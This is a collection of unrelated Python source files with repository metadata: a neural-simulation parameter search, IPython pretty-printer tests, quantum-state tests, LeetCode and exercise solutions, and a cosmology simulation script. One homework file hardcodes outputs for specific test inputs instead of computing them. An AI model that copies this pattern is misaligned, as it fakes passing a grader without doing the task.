5c46e21a7c712de8c20df35aac7232945dd2de5e | 069dafce9f495f09bf8c2f76dbf5c045b7551721 | /parameter_search_run.py | 9b187b743f036d55c4b46d15f0b1e9df88fc9b9c | [] | no_license | dguarino/T2 | 26b1bc640812aa5438b09f9fab2bc73096cd7eef | 66b786928508089492f5f696c7c1576e098c6615 | refs/heads/master | 2020-04-03T22:39:06.059845 | 2020-03-13T15:43:02 | 2020-03-13T15:43:02 | 41,812,819 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,392 | py | # -*- coding: utf-8 -*-
import sys
from mozaik.meta_workflow.parameter_search import CombinationParameterSearch,SlurmSequentialBackend
import numpy
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'retina_lgn.params.gain' : [0.1],
'l4_cortex_exc.params.density' : [10],
}).run_parameter_search()
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l4_cortex_exc.AfferentConnection.base_weight' : [0.0015],
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.003],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.003],
'l23_cortex_inh.L4ExcL23InhConnection.base_weight' : [0.0001],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.0025],
'l23_cortex_inh.L23InhL23InhConnection.base_weight' : [0.0017],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.0004],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.002,0.0025,0.003],
'l4_cortex_inh.ExcInhAfferentRatio' : [1.7],
'l4_cortex_exc.params.density' : [300],
'only_afferent' : [False],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.U' : [0.1,0.13,0.16],
}).run_parameter_search()
if False:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.002,0.001],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.002,0.001],
'l23_cortex_inh.L4ExcL23InhConnection.base_weight' : [0.0001,0.001],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.0025,0.003,0.0035],
'l23_cortex_inh.L23InhL23InhConnection.base_weight' : [0.0017],
'l4_cortex_exc.L4ExcL4ExcConnection.base_weight' : [0.0005],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.0007,0.00075],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.0018],
'l4_cortex_inh.ExcInhAfferentRatio' : [1.4,1.3],
'l4_cortex_exc.params.density' : [300],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.tau_rec' : [25],
}).run_parameter_search()
if True:
CombinationParameterSearch(SlurmSequentialBackend(num_threads=1,num_mpi=64),{
'l4_cortex_exc.AfferentConnection.base_weight' : [0.0015],
'l4_cortex_inh.L4InhL4ExcConnection.base_weight' : [0.0007],
'l4_cortex_exc.L4ExcL4InhConnection.base_weight' : [0.00065],
'l23_cortex_exc.L23ExcL23InhConnection.base_weight' : [0.0015],
'l23_cortex_inh.L23InhL23ExcConnection.base_weight' : [0.003],
'l23_cortex_exc.L4ExcL23ExcConnection.base_weight' : [0.002,0.0015],
'l4_cortex_inh.ExcInhAfferentRatio' : [0.6],
'l4_cortex_exc.params.density' : [900,1800],
'l23_cortex_exc.params.density' : [300,900],
'l4_cortex_exc.rand_struct_ratio' : [0.75,0.8,0.9],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.tau_fac' : [300],
'l4_cortex_inh.L4InhL4ExcConnection.short_term_plasticity.U' : [0.11],
}).run_parameter_search()
| [
"[email protected]"
] | |
93d0d5a423aaa8cebf164009c713ebde7d0028f0 | 9c4e02ba5201794a4c5cbff548db1be7c87409c1 | /venv/lib/python3.9/site-packages/IPython/lib/tests/test_pretty.py | ca16924e8f7bd132fc8031ca2e683ea568b99725 | [
"Apache-2.0",
"MIT"
] | permissive | ClassWizard/PodLockParser | 4faf4679d404158b3cf2b1ceb4faabca461b0008 | 84f6d3fced521849657d21ae4cb9681f5897b957 | refs/heads/master | 2022-12-23T20:39:48.096729 | 2022-02-08T09:49:01 | 2022-02-08T09:49:01 | 167,668,617 | 2 | 1 | MIT | 2022-12-14T10:01:41 | 2019-01-26T08:50:35 | Python | UTF-8 | Python | false | false | 14,719 | py | # coding: utf-8
"""Tests for IPython.lib.pretty."""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
from collections import Counter, defaultdict, deque, OrderedDict, UserList
import os
import pytest
import types
import string
import sys
import unittest
import pytest
from IPython.lib import pretty
from io import StringIO
class MyList(object):
def __init__(self, content):
self.content = content
def _repr_pretty_(self, p, cycle):
if cycle:
p.text("MyList(...)")
else:
with p.group(3, "MyList(", ")"):
for (i, child) in enumerate(self.content):
if i:
p.text(",")
p.breakable()
else:
p.breakable("")
p.pretty(child)
class MyDict(dict):
def _repr_pretty_(self, p, cycle):
p.text("MyDict(...)")
class MyObj(object):
def somemethod(self):
pass
class Dummy1(object):
def _repr_pretty_(self, p, cycle):
p.text("Dummy1(...)")
class Dummy2(Dummy1):
_repr_pretty_ = None
class NoModule(object):
pass
NoModule.__module__ = None
class Breaking(object):
def _repr_pretty_(self, p, cycle):
with p.group(4,"TG: ",":"):
p.text("Breaking(")
p.break_()
p.text(")")
class BreakingRepr(object):
def __repr__(self):
return "Breaking(\n)"
class BadRepr(object):
def __repr__(self):
return 1/0
def test_indentation():
"""Test correct indentation in groups"""
count = 40
gotoutput = pretty.pretty(MyList(range(count)))
expectedoutput = "MyList(\n" + ",\n".join(" %d" % i for i in range(count)) + ")"
assert gotoutput == expectedoutput
def test_dispatch():
"""
Test correct dispatching: The _repr_pretty_ method for MyDict
must be found before the registered printer for dict.
"""
gotoutput = pretty.pretty(MyDict())
expectedoutput = "MyDict(...)"
assert gotoutput == expectedoutput
def test_callability_checking():
"""
Test that the _repr_pretty_ method is tested for callability and skipped if
not.
"""
gotoutput = pretty.pretty(Dummy2())
expectedoutput = "Dummy1(...)"
assert gotoutput == expectedoutput
@pytest.mark.parametrize(
"obj,expected_output",
zip(
[
set(),
frozenset(),
set([1]),
frozenset([1]),
set([1, 2]),
frozenset([1, 2]),
set([-1, -2, -3]),
],
[
"set()",
"frozenset()",
"{1}",
"frozenset({1})",
"{1, 2}",
"frozenset({1, 2})",
"{-3, -2, -1}",
],
),
)
def test_sets(obj, expected_output):
"""
Test that set and frozenset use Python 3 formatting.
"""
got_output = pretty.pretty(obj)
assert got_output == expected_output
def test_pprint_heap_allocated_type():
"""
Test that pprint works for heap allocated types.
"""
module_name = "xxlimited" if sys.version_info < (3, 10) else "xxlimited_35"
xxlimited = pytest.importorskip(module_name)
output = pretty.pretty(xxlimited.Null)
assert output == "xxlimited.Null"
def test_pprint_nomod():
"""
Test that pprint works for classes with no __module__.
"""
output = pretty.pretty(NoModule)
assert output == "NoModule"
def test_pprint_break():
"""
Test that p.break_ produces expected output
"""
output = pretty.pretty(Breaking())
expected = "TG: Breaking(\n ):"
assert output == expected
def test_pprint_break_repr():
"""
Test that p.break_ is used in repr
"""
output = pretty.pretty([[BreakingRepr()]])
expected = "[[Breaking(\n )]]"
assert output == expected
output = pretty.pretty([[BreakingRepr()]*2])
expected = "[[Breaking(\n ),\n Breaking(\n )]]"
assert output == expected
def test_bad_repr():
"""Don't catch bad repr errors"""
with pytest.raises(ZeroDivisionError):
pretty.pretty(BadRepr())
class BadException(Exception):
def __str__(self):
return -1
class ReallyBadRepr(object):
__module__ = 1
@property
def __class__(self):
raise ValueError("I am horrible")
def __repr__(self):
raise BadException()
def test_really_bad_repr():
with pytest.raises(BadException):
pretty.pretty(ReallyBadRepr())
class SA(object):
pass
class SB(SA):
pass
class TestsPretty(unittest.TestCase):
def test_super_repr(self):
# "<super: module_name.SA, None>"
output = pretty.pretty(super(SA))
self.assertRegex(output, r"<super: \S+.SA, None>")
# "<super: module_name.SA, <module_name.SB at 0x...>>"
sb = SB()
output = pretty.pretty(super(SA, sb))
self.assertRegex(output, r"<super: \S+.SA,\s+<\S+.SB at 0x\S+>>")
def test_long_list(self):
lis = list(range(10000))
p = pretty.pretty(lis)
last2 = p.rsplit('\n', 2)[-2:]
self.assertEqual(last2, [' 999,', ' ...]'])
def test_long_set(self):
s = set(range(10000))
p = pretty.pretty(s)
last2 = p.rsplit('\n', 2)[-2:]
self.assertEqual(last2, [' 999,', ' ...}'])
def test_long_tuple(self):
tup = tuple(range(10000))
p = pretty.pretty(tup)
last2 = p.rsplit('\n', 2)[-2:]
self.assertEqual(last2, [' 999,', ' ...)'])
def test_long_dict(self):
d = { n:n for n in range(10000) }
p = pretty.pretty(d)
last2 = p.rsplit('\n', 2)[-2:]
self.assertEqual(last2, [' 999: 999,', ' ...}'])
def test_unbound_method(self):
output = pretty.pretty(MyObj.somemethod)
self.assertIn('MyObj.somemethod', output)
class MetaClass(type):
def __new__(cls, name):
return type.__new__(cls, name, (object,), {'name': name})
def __repr__(self):
return "[CUSTOM REPR FOR CLASS %s]" % self.name
ClassWithMeta = MetaClass('ClassWithMeta')
def test_metaclass_repr():
output = pretty.pretty(ClassWithMeta)
assert output == "[CUSTOM REPR FOR CLASS ClassWithMeta]"
def test_unicode_repr():
u = u"üniçodé"
ustr = u
class C(object):
def __repr__(self):
return ustr
c = C()
p = pretty.pretty(c)
assert p == u
p = pretty.pretty([c])
assert p == u"[%s]" % u
def test_basic_class():
def type_pprint_wrapper(obj, p, cycle):
if obj is MyObj:
type_pprint_wrapper.called = True
return pretty._type_pprint(obj, p, cycle)
type_pprint_wrapper.called = False
stream = StringIO()
printer = pretty.RepresentationPrinter(stream)
printer.type_pprinters[type] = type_pprint_wrapper
printer.pretty(MyObj)
printer.flush()
output = stream.getvalue()
assert output == "%s.MyObj" % __name__
assert type_pprint_wrapper.called is True
def test_collections_userlist():
# Create userlist with cycle
a = UserList()
a.append(a)
cases = [
(UserList(), "UserList([])"),
(
UserList(i for i in range(1000, 1020)),
"UserList([1000,\n"
" 1001,\n"
" 1002,\n"
" 1003,\n"
" 1004,\n"
" 1005,\n"
" 1006,\n"
" 1007,\n"
" 1008,\n"
" 1009,\n"
" 1010,\n"
" 1011,\n"
" 1012,\n"
" 1013,\n"
" 1014,\n"
" 1015,\n"
" 1016,\n"
" 1017,\n"
" 1018,\n"
" 1019])",
),
(a, "UserList([UserList(...)])"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_collections_defaultdict():
# Create defaultdicts with cycles
a = defaultdict()
a.default_factory = a
b = defaultdict(list)
b['key'] = b
# Dictionary order cannot be relied on, test against single keys.
cases = [
(defaultdict(list), 'defaultdict(list, {})'),
(defaultdict(list, {'key': '-' * 50}),
"defaultdict(list,\n"
" {'key': '--------------------------------------------------'})"),
(a, 'defaultdict(defaultdict(...), {})'),
(b, "defaultdict(list, {'key': defaultdict(...)})"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_collections_ordereddict():
# Create OrderedDict with cycle
a = OrderedDict()
a['key'] = a
cases = [
(OrderedDict(), 'OrderedDict()'),
(OrderedDict((i, i) for i in range(1000, 1010)),
'OrderedDict([(1000, 1000),\n'
' (1001, 1001),\n'
' (1002, 1002),\n'
' (1003, 1003),\n'
' (1004, 1004),\n'
' (1005, 1005),\n'
' (1006, 1006),\n'
' (1007, 1007),\n'
' (1008, 1008),\n'
' (1009, 1009)])'),
(a, "OrderedDict([('key', OrderedDict(...))])"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_collections_deque():
# Create deque with cycle
a = deque()
a.append(a)
cases = [
(deque(), 'deque([])'),
(deque(i for i in range(1000, 1020)),
'deque([1000,\n'
' 1001,\n'
' 1002,\n'
' 1003,\n'
' 1004,\n'
' 1005,\n'
' 1006,\n'
' 1007,\n'
' 1008,\n'
' 1009,\n'
' 1010,\n'
' 1011,\n'
' 1012,\n'
' 1013,\n'
' 1014,\n'
' 1015,\n'
' 1016,\n'
' 1017,\n'
' 1018,\n'
' 1019])'),
(a, 'deque([deque(...)])'),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_collections_counter():
class MyCounter(Counter):
pass
cases = [
(Counter(), 'Counter()'),
(Counter(a=1), "Counter({'a': 1})"),
(MyCounter(a=1), "MyCounter({'a': 1})"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_mappingproxy():
MP = types.MappingProxyType
underlying_dict = {}
mp_recursive = MP(underlying_dict)
underlying_dict[2] = mp_recursive
underlying_dict[3] = underlying_dict
cases = [
(MP({}), "mappingproxy({})"),
(MP({None: MP({})}), "mappingproxy({None: mappingproxy({})})"),
(MP({k: k.upper() for k in string.ascii_lowercase}),
"mappingproxy({'a': 'A',\n"
" 'b': 'B',\n"
" 'c': 'C',\n"
" 'd': 'D',\n"
" 'e': 'E',\n"
" 'f': 'F',\n"
" 'g': 'G',\n"
" 'h': 'H',\n"
" 'i': 'I',\n"
" 'j': 'J',\n"
" 'k': 'K',\n"
" 'l': 'L',\n"
" 'm': 'M',\n"
" 'n': 'N',\n"
" 'o': 'O',\n"
" 'p': 'P',\n"
" 'q': 'Q',\n"
" 'r': 'R',\n"
" 's': 'S',\n"
" 't': 'T',\n"
" 'u': 'U',\n"
" 'v': 'V',\n"
" 'w': 'W',\n"
" 'x': 'X',\n"
" 'y': 'Y',\n"
" 'z': 'Z'})"),
(mp_recursive, "mappingproxy({2: {...}, 3: {2: {...}, 3: {...}}})"),
(underlying_dict,
"{2: mappingproxy({2: {...}, 3: {...}}), 3: {...}}"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
# TODO : pytest.mark.parametrise once nose is gone.
def test_simplenamespace():
SN = types.SimpleNamespace
sn_recursive = SN()
sn_recursive.first = sn_recursive
sn_recursive.second = sn_recursive
cases = [
(SN(), "namespace()"),
(SN(x=SN()), "namespace(x=namespace())"),
(SN(a_long_name=[SN(s=string.ascii_lowercase)]*3, a_short_name=None),
"namespace(a_long_name=[namespace(s='abcdefghijklmnopqrstuvwxyz'),\n"
" namespace(s='abcdefghijklmnopqrstuvwxyz'),\n"
" namespace(s='abcdefghijklmnopqrstuvwxyz')],\n"
" a_short_name=None)"),
(sn_recursive, "namespace(first=namespace(...), second=namespace(...))"),
]
for obj, expected in cases:
assert pretty.pretty(obj) == expected
def test_pretty_environ():
dict_repr = pretty.pretty(dict(os.environ))
# reindent to align with 'environ' prefix
dict_indented = dict_repr.replace('\n', '\n' + (' ' * len('environ')))
env_repr = pretty.pretty(os.environ)
assert env_repr == "environ" + dict_indented
def test_function_pretty():
"Test pretty print of function"
# posixpath is a pure python module, its interface is consistent
# across Python distributions
import posixpath
assert pretty.pretty(posixpath.join) == "<function posixpath.join(a, *p)>"
# custom function
def meaning_of_life(question=None):
if question:
return 42
return "Don't panic"
assert "meaning_of_life(question=None)" in pretty.pretty(meaning_of_life)
class OrderedCounter(Counter, OrderedDict):
'Counter that remembers the order elements are first encountered'
def __repr__(self):
return '%s(%r)' % (self.__class__.__name__, OrderedDict(self))
def __reduce__(self):
return self.__class__, (OrderedDict(self),)
class MySet(set): # Override repr of a basic type
def __repr__(self):
return 'mine'
def test_custom_repr():
"""A custom repr should override a pretty printer for a parent type"""
oc = OrderedCounter("abracadabra")
assert "OrderedCounter(OrderedDict" in pretty.pretty(oc)
assert pretty.pretty(MySet()) == "mine"
| [
"[email protected]"
] | |
8be51e93ecf1dfcf1bdc6f52dba28b197841a503 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2607/60752/306988.py | dae9adee217584b8283a077e38a3a77149f01b12 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 376 | py |
num=int(input())
no=True
for i in range(num):
i=input()
if i=="0102010112":
no=False
print(2)
if i=="102100211102":
no=False
print(6)
if i=="01020101122200":
no=False
print(7)
if i=="0102010":
no=False
print(2)
if i=="102100211":
no=False
print(5)
if no:print(i) | [
"[email protected]"
] | |
4c64c9d474c1f60086cdba4d5537c4df90ce9022 | 4751a9daca11558dd0780f2e8b9477a484ebc7f4 | /src/qibo/tests_new/test_core_states.py | e6de75b1aef09e71410c5494b3f623d3da275459 | [
"Apache-2.0"
] | permissive | drheli/qibo | f6875ed39883fe7bfa0b8939abb042fe636c5de7 | b99568aee9f978a5a82e92860c8d17e3358af7b9 | refs/heads/master | 2023-04-17T20:40:44.324689 | 2021-04-29T16:29:40 | 2021-04-29T16:29:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,950 | py | """Tests methods defined in `qibo/core/states.py`."""
import pytest
import numpy as np
import qibo
from qibo import K
from qibo.core import states
def test_state_shape_and_dtype(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.zero_state(3)
assert state.shape == (8,)
assert state.dtype == K.dtypes('DTYPECPX')
state = states.MatrixState.zero_state(3)
assert state.shape == (8, 8)
assert state.dtype == K.dtypes('DTYPECPX')
qibo.set_backend(original_backend)
@pytest.mark.parametrize("nqubits", [None, 2])
def test_vector_state_tensor_setter(backend, nqubits):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState(nqubits)
with pytest.raises(AttributeError):
tensor = state.tensor
state.tensor = np.ones(4)
assert state.nqubits == 2
np.testing.assert_allclose(state.tensor, np.ones(4))
np.testing.assert_allclose(np.array(state), np.ones(4))
np.testing.assert_allclose(state.numpy(), np.ones(4))
np.testing.assert_allclose(state.state(numpy=True), np.ones(4))
np.testing.assert_allclose(state.state(numpy=False), np.ones(4))
with pytest.raises(ValueError):
state.tensor = np.zeros(5)
qibo.set_backend(original_backend)
@pytest.mark.parametrize("nqubits", [None, 2])
def test_matrix_state_tensor_setter(backend, nqubits):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
# TODO: Fix this
qibo.set_backend(original_backend)
def test_zero_state_initialization(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.zero_state(4)
target_state = np.zeros(16)
target_state[0] = 1
np.testing.assert_allclose(state.tensor, target_state)
state = states.MatrixState.zero_state(3)
target_state = np.zeros((8, 8))
target_state[0, 0] = 1
np.testing.assert_allclose(state.tensor, target_state)
qibo.set_backend(original_backend)
def test_plus_state_initialization(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
state = states.VectorState.plus_state(4)
target_state = np.ones(16) / 4
np.testing.assert_allclose(state.tensor, target_state)
state = states.MatrixState.plus_state(3)
target_state = np.ones((8, 8)) / 8
np.testing.assert_allclose(state.tensor, target_state)
qibo.set_backend(original_backend)
def test_vector_state_to_density_matrix(backend):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
vector = np.random.random(32) + 1j * np.random.random(32)
vector = vector / np.sqrt((np.abs(vector) ** 2).sum())
state = states.VectorState.from_tensor(vector)
mstate = state.to_density_matrix()
target_matrix = np.outer(vector, vector.conj())
np.testing.assert_allclose(mstate.tensor, target_matrix)
state = states.MatrixState.from_tensor(target_matrix)
with pytest.raises(RuntimeError):
state.to_density_matrix()
qibo.set_backend(original_backend)
@pytest.mark.parametrize("state_type", ["VectorState", "MatrixState"])
@pytest.mark.parametrize("use_gate", [False, True])
def test_state_probabilities(backend, state_type, use_gate):
state = getattr(states, state_type).plus_state(4)
if use_gate:
from qibo import gates
mgate = gates.M(0, 1)
probs = state.probabilities(measurement_gate=mgate)
else:
probs = state.probabilities(qubits=[0, 1])
target_probs = np.ones((2, 2)) / 4
np.testing.assert_allclose(probs, target_probs)
def test_state_probabilities_errors():
from qibo import gates
state = states.VectorState.zero_state(3)
mgate = gates.M(0)
qubits = [0]
with pytest.raises(ValueError):
probs = state.probabilities()
with pytest.raises(ValueError):
probs = state.probabilities(qubits, mgate)
@pytest.mark.parametrize("registers", [None, {"a": (0,), "b": (2,)}])
def test_state_measure(registers):
from qibo import gates
state = states.VectorState.zero_state(4)
mgate = gates.M(0, 2)
assert state.measurements is None
with pytest.raises(RuntimeError):
samples = state.samples()
state.measure(mgate, nshots=100, registers=registers)
target_samples = np.zeros((100, 2))
np.testing.assert_allclose(state.samples(), target_samples)
assert state.frequencies() == {"00": 100}
if registers is not None:
target_freqs = {"a": {"0": 100}, "b": {"0": 100}}
else:
target_freqs = {"00": 100}
assert state.frequencies(registers=True) == target_freqs
@pytest.mark.parametrize("registers", [None, {"a": (0,), "b": (2,)}])
def test_state_set_measurements(registers):
from qibo import gates
state = states.VectorState.zero_state(3)
samples = np.array(50 * [0] + 50 * [1])
state.set_measurements([0, 2], samples, registers)
target_samples = np.array(50 * [[0, 0]] + 50 * [[0, 1]])
np.testing.assert_allclose(state.samples(), target_samples)
assert state.frequencies() == {"00": 50, "01": 50}
if registers is not None:
target_freqs = {"a": {"0": 100}, "b": {"0": 50, "1": 50}}
else:
target_freqs = {"00": 50, "01": 50}
assert state.frequencies(registers=True) == target_freqs
def test_state_apply_bitflips():
state = states.VectorState.zero_state(3)
with pytest.raises(RuntimeError):
state.apply_bitflips(0.1)
# Bitflips are tested in measurement tests
@pytest.mark.parametrize("trotter", [True, False])
def test_vector_state_expectation(backend, trotter):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
from qibo.hamiltonians import XXZ
ham = XXZ(nqubits=5, delta=0.5, trotter=trotter)
matrix = np.array(ham.matrix)
state = np.random.random(32) + 1j * np.random.random(32)
norm = np.sum(np.abs(state) ** 2)
target_ev = np.sum(state.conj() * matrix.dot(state)).real
state = states.VectorState.from_tensor(state)
np.testing.assert_allclose(state.expectation(ham), target_ev)
np.testing.assert_allclose(state.expectation(ham, True), target_ev / norm)
qibo.set_backend(original_backend)
@pytest.mark.parametrize("trotter", [True, False])
def test_matrix_state_expectation(backend, trotter):
original_backend = qibo.get_backend()
qibo.set_backend(backend)
from qibo.hamiltonians import TFIM
ham = TFIM(nqubits=2, h=1.0, trotter=trotter)
matrix = np.array(ham.matrix)
state = np.random.random((4, 4)) + 1j * np.random.random((4, 4))
state = state + state.T.conj()
norm = np.trace(state)
target_ev = np.trace(matrix.dot(state)).real
state = states.MatrixState.from_tensor(state)
np.testing.assert_allclose(state.expectation(ham), target_ev)
np.testing.assert_allclose(state.expectation(ham, True), target_ev / norm)
qibo.set_backend(original_backend)
| [
"[email protected]"
] | |
5a079b27f0e2992db8f4dbb72c87f6e6b027de9a | 94bd78e63de94859eb076e52683f73f6ea91eae3 | /416.py | 0773cf6b7a43f7ff49a67c9e9c011f08efce2842 | [] | no_license | MadSkittles/leetcode | 70598c1c861a8ff5d2f7c921a311307d55770acc | 817bbb73dfe095b9c9358dc459ba6605a2a9a256 | refs/heads/master | 2021-11-30T04:56:02.432749 | 2021-11-12T03:28:47 | 2021-11-12T03:28:47 | 123,558,601 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,337 | py | class Solution:
def canPartition(self, nums):
from itertools import accumulate
nums = sorted(nums)
s = [*accumulate(nums, lambda x, y: x + y)]
if s[-1] & 1:
return False
dp = [True] + [False] * s[-1]
for i in range(len(nums)):
for j in range(s[i], -1, -1):
if j >= nums[i]:
dp[j] = dp[j] or dp[j - nums[i]]
if s[i] >= s[-1] // 2:
break
return dp[s[-1] // 2]
def canPartition1(self, nums):
self.nums = nums
s = sum(nums)
return not s & 1 and self.f(0, s // 2)
from functools import lru_cache
@lru_cache(maxsize=None)
def f(self, index, s):
if s == 0:
return True
if s < 0 or index >= len(self.nums):
return False
return self.f(index + 1, s - self.nums[index]) or self.f(index + 1, s)
if __name__ == '__main__':
solution = Solution()
print(solution.canPartition(
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 100]))
| [
"[email protected]"
] | |
39018bd8df654c888bf236f792358094e3d6bea6 | 77ae7c76d36009daa01b2317439c1f975f7932b2 | /exercicios/ex060att.py | f43127dd20c9afd7b1bbc847fd39bb8f04294c07 | [] | no_license | MatheusOldAccount/Exerc-cios-de-Python-do-Curso-em-Video | 5f26b5a2867fa1a2e36b486a809dfbe8b107b8c2 | 5696c49d3caf5cae817217a2da0598d1cf794f5b | refs/heads/master | 2022-03-22T10:49:33.666660 | 2019-11-25T21:24:43 | 2019-11-25T21:24:43 | 224,052,682 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 321 | py | fat = int(input('Digite um número para\ncalcular seu Fatorial: '))
print('Calculando {}! ='.format(fat), end=' ')
resultado = 1
while fat > 0:
if fat == 1:
print('{} ='.format(fat), end=' ')
else:
print('{} x'.format(fat), end=' ')
resultado *= fat
fat -= 1
print('{}'.format(resultado))
| [
"[email protected]"
] | |
adcfd87bb4a72a735c4618f56ed5135b4423a71d | 7c47e106c9ec85a7239c84c55ad5f20972edefcf | /tests/heavy_sterile_dirac_neutrino/__main__.py | 3d91e82acbdf3d14050992aea89e033d2d9f6408 | [] | no_license | anasthesia/pyBBN | 11813717ad5023a9b29f9594ccde93fbc2d5a0c9 | 0e88604b765eb5ce2f196909c65cf2af11a8cc2f | refs/heads/master | 2021-01-21T03:37:46.309318 | 2016-05-10T12:03:50 | 2016-05-10T12:03:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,223 | py | # -*- coding: utf-8 -*-
"""
## Heavy sterile dirac neutrino
$$ M = 33.9 MeV $$
$$ \theta_\tau \approx 4.86 10^{-2} \sim \tau_N \approx 0.3 sec $$
http://arxiv.org/pdf/hep-ph/0002223v2.pdf
<img src="plots.svg" width=100% />
<img src="particles.svg" width=100% />
"""
import os
import argparse
from collections import defaultdict
from particles import Particle
from library.SM import particles as SMP, interactions as SMI
from library.NuMSM import particles as NuP, interactions as NuI
from evolution import Universe
from common import UNITS, Params
parser = argparse.ArgumentParser(description='Run simulation for given mass and mixing angle')
parser.add_argument('--mass', default='33.9')
parser.add_argument('--theta', default='0.0486')
parser.add_argument('--tau', default='0.3')
parser.add_argument('--Tdec', default='5')
parser.add_argument('--comment', default='')
args = parser.parse_args()
mass = float(args.mass) * UNITS.MeV
theta = float(args.theta)
lifetime = float(args.tau) * UNITS.s
T_dec = float(args.Tdec) * UNITS.MeV
folder = os.path.join(os.path.split(__file__)[0], args.tau)
T_initial = max(50. * UNITS.MeV, T_dec)
T_interaction_freezeout = 0.05 * UNITS.MeV
T_final = 0.0008 * UNITS.MeV
params = Params(T=T_initial,
dy=0.05)
universe = Universe(params=params, folder=folder)
photon = Particle(**SMP.photon)
electron = Particle(**SMP.leptons.electron)
muon = Particle(**SMP.leptons.muon)
neutrino_e = Particle(**SMP.leptons.neutrino_e)
neutrino_mu = Particle(**SMP.leptons.neutrino_mu)
neutrino_tau = Particle(**SMP.leptons.neutrino_tau)
sterile = Particle(**NuP.dirac_sterile_neutrino(mass))
sterile.decoupling_temperature = T_initial
neutrino_e.decoupling_temperature = 5 * UNITS.MeV
neutrino_mu.decoupling_temperature = 5 * UNITS.MeV
neutrino_tau.decoupling_temperature = 5 * UNITS.MeV
universe.add_particles([
photon,
electron,
muon,
neutrino_e,
neutrino_mu,
neutrino_tau,
sterile,
])
thetas = defaultdict(float, {
'tau': theta,
})
universe.interactions += (
SMI.neutrino_interactions(
leptons=[electron],
neutrinos=[neutrino_e, neutrino_mu, neutrino_tau]
) + NuI.sterile_leptons_interactions(
thetas=thetas, sterile=sterile,
neutrinos=[neutrino_e, neutrino_mu, neutrino_tau],
leptons=[electron, muon]
)
)
universe.init_kawano(electron=electron, neutrino=neutrino_e)
if universe.graphics:
from plotting import RadiationParticleMonitor, MassiveParticleMonitor, DensityAndEnergyMonitor
universe.graphics.monitor([
(neutrino_e, RadiationParticleMonitor),
(neutrino_mu, RadiationParticleMonitor),
(neutrino_tau, RadiationParticleMonitor),
(sterile, MassiveParticleMonitor),
(sterile, DensityAndEnergyMonitor)
])
universe.evolve(T_interaction_freezeout, export=False)
universe.interactions = tuple()
universe.params.dy = 0.0125
universe.evolve(T_final)
"""
### Plots for comparison with articles
### JCAP10(2012)014, Figure 9
<img src="figure_9.svg" width=100% />
### JCAP10(2012)014, Figure 10
<img src="figure_10.svg" width=100% />
<img src="figure_10_full.svg" width=100% />
"""
if universe.graphics:
from tests.plots import articles_comparison_plots
articles_comparison_plots(universe, [neutrino_e, neutrino_mu, neutrino_tau, sterile])
import os
import csv
from itertools import izip
density_data = universe.graphics.particles[4][1].data[0]
energy_data = universe.graphics.particles[4][1].data[1]
with open(os.path.join(universe.folder, 'normalized_density_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*density_data):
writer.writerow([x, y])
with open(os.path.join(universe.folder, 'normalized_energy_density_plot.dat'), 'w') as f:
writer = csv.writer(f, delimiter='\t')
for x, y in izip(*energy_data):
writer.writerow([x, y])
regime_data = universe.graphics.particles[3][1].data[0]
